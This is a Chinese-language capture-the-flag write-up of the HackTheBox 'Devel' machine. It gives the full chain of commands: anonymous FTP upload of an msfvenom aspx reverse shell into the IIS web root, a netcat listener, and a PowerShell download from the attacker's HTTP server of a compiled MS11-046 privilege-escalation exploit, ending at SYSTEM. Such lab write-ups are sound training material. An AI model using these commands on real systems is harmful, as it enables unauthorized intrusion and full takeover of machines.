HackTheBox-Machines Devel Writeup

先 nmap 一下：

└──╼ [★]$ nmap -sV --script vuln 10.129.153.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 06:29 CDT
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 06:33 (0:00:01 remaining)
Nmap scan report for 10.129.153.100
Host is up (0.077s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
| vulners: 
|   cpe:/a:microsoft:internet_information_services:7.5: 
|     	PACKETSTORM:180580	10.0	https://vulners.com/packetstorm/PACKETSTORM:180580	*EXPLOIT*
|     	MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF-	10.0	https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF-	*EXPLOIT*
|     	CVE-2010-3972	10.0	https://vulners.com/cve/CVE-2010-3972
|     	SSV:20122	9.3	https://vulners.com/seebug/SSV:20122	*EXPLOIT*
|     	CVE-2010-2730	9.3	https://vulners.com/cve/CVE-2010-2730
|     	SSV:20121	4.3	https://vulners.com/seebug/SSV:20121	*EXPLOIT*
|     	PACKETSTORM:180584	4.3	https://vulners.com/packetstorm/PACKETSTORM:180584	*EXPLOIT*
|     	MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS-	4.3	https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS-	*EXPLOIT*
|     	CVE-2010-1899	4.3	https://vulners.com/cve/CVE-2010-1899
|     	EDB-ID:15803	0.0	https://vulners.com/exploitdb/EDB-ID:15803	*EXPLOIT*
|_    	EDB-ID:15167	0.0	https://vulners.com/exploitdb/EDB-ID:15167	*EXPLOIT*
|_http-server-header: Microsoft-IIS/7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.50 seconds

他有開 ftp，我們可以用 anonymous 登入看到下面的資訊：

ftp> ftp 10.129.153.100
Connected to 10.129.153.100.
220 Microsoft FTP Service
Name (10.129.153.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

透過瀏覽器可以看到下面的畫面：

這表示了 FTP 跟 HTTP 伺服器共享同一個根目錄，這問題很大，因為我們可以透過上傳惡意的文件，然後透過 http 來觸發，例如說 reverse shell。
這邊會用到 metasploit 框架中的一個工具，可以用來生 payloads。
透過下面的指令我們可以看到 aspx 是支援的格式，同時從剛剛 FTP 的資訊我們可以看到他的目錄名稱應該是 ASP.NET 生成的，包括 iisstart.htm 是一個標準的 IIS（Internet Information Services） 的起始頁面，可以得知上面在運行 Microsoft IIS Web 的伺服器。根據上面的資訊我們會用 aspx 來生成我們的 reverse shell。

└──╼ [★]$ msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

我們用下面的指令選一個看起來最普通的：

└──╼ [★]$ msfvenom --list payloads | grep windows | grep reverse 

生 reverse shell：

└──╼ [★]$ msfvenom -p windows/x64/shell/reverse_tcp -f aspx lhost=tun0 lport=4444 rhost=10.129.151.61 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3675 bytes
Saved as: rshell.aspx

生好了！接著我們把他丟上去 FTP

ftp> ftp 10.129.151.61
Connected to 10.129.151.61.
220 Microsoft FTP Service
Name (10.129.151.61:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put rshell.aspx 
local: rshell.aspx remote: rshell.aspx
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************|  3722       59.15 MiB/s    --:-- ETA
226 Transfer complete.
3722 bytes sent in 00:00 (13.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
10-28-24  01:39PM                 3722 rshell.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

結果上面那個 payload 好像行不通，我換成下面這個就成功了：

└──╼ [★]$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.63 LPORT=4444 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2719 bytes
Saved as: rshell.aspx

然後瀏覽器訪問就觸發 reverse shell 了：

└──╼ [★]$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.10.14.63] from (UNKNOWN) [10.129.151.61] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

結果進去之後連 user flag 的權限都還沒有，然後也發現這台伺服器是 x86 難怪剛剛的第一次的 payload 不會過：

c:\Users>cd babis
cd babis
Access is denied.

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of c:\Users

18/03/2017  01:16 ��    <DIR>          .
18/03/2017  01:16 ��    <DIR>          ..
18/03/2017  01:16 ��    <DIR>          Administrator
17/03/2017  04:17 ��    <DIR>          babis
18/03/2017  01:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  09:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   4.396.625.920 bytes free

c:\Users>systeminfo 
systeminfo 

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          28/10/2024, 1:26:00 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.456 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.535 MB
Virtual Memory: In Use:    606 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.151.61
                                 [02]: fe80::d981:e519:55b8:816
                                 [03]: dead:beef::8870:1e16:d944:cf4e
                                 [04]: dead:beef::d981:e519:55b8:816

從上面的資訊我們還可以得知作業系統的版本很舊，是 Windows 7 最早期的版本，已知存在許多漏洞。
我們可以透過 searchsploit 來找尋 Exploit Database (exploit-db) 中的漏洞資料使用方法如下，我們可以先去 google win7 x86 提權有哪些：

然後在上面可以看到左上角有一個 EDB-ID 我們可以這樣用：

└──╼ [★]$ searchsploit -u ## update
└──╼ [★]$ searchsploit -m 47176
  Exploit: Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/47176
     Path: /usr/share/exploitdb/exploits/windows_x86/local/47176.cpp
    Codes: CVE-2019-1132
 Verified: False
File Type: C source, ASCII text
Copied to: /home/kazma/47176.cpp

結果他沒有寫要怎麼編譯遇到很多環境問題，決定換另外一個有寫編譯方式的：

└──╼ [★]$ searchsploit -m 40564
  Exploit: Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
      URL: https://www.exploit-db.com/exploits/40564
     Path: /usr/share/exploitdb/exploits/windows_x86/local/40564.c
    Codes: CVE-2011-1249, MS11-046
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kazma/40564.c

┌─[eu-dedivip-1]─[10.10.14.63]─[kazma@htb-wnzfbgnuq9]─[~]
└──╼ [★]$ i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

然後用 python 的 http.server 讓我們從目標機器載下 payload:

└──╼ [★]$ python -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

從目標機器載下來：

c:\Users>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8000/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.63:8000/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

執行腳本：

c:\Users\Public\Downloads>40564.exe
40564.exe

c:\Windows\System32>whoami
whoami
nt authority\system

拿下機器！

Pwned !!!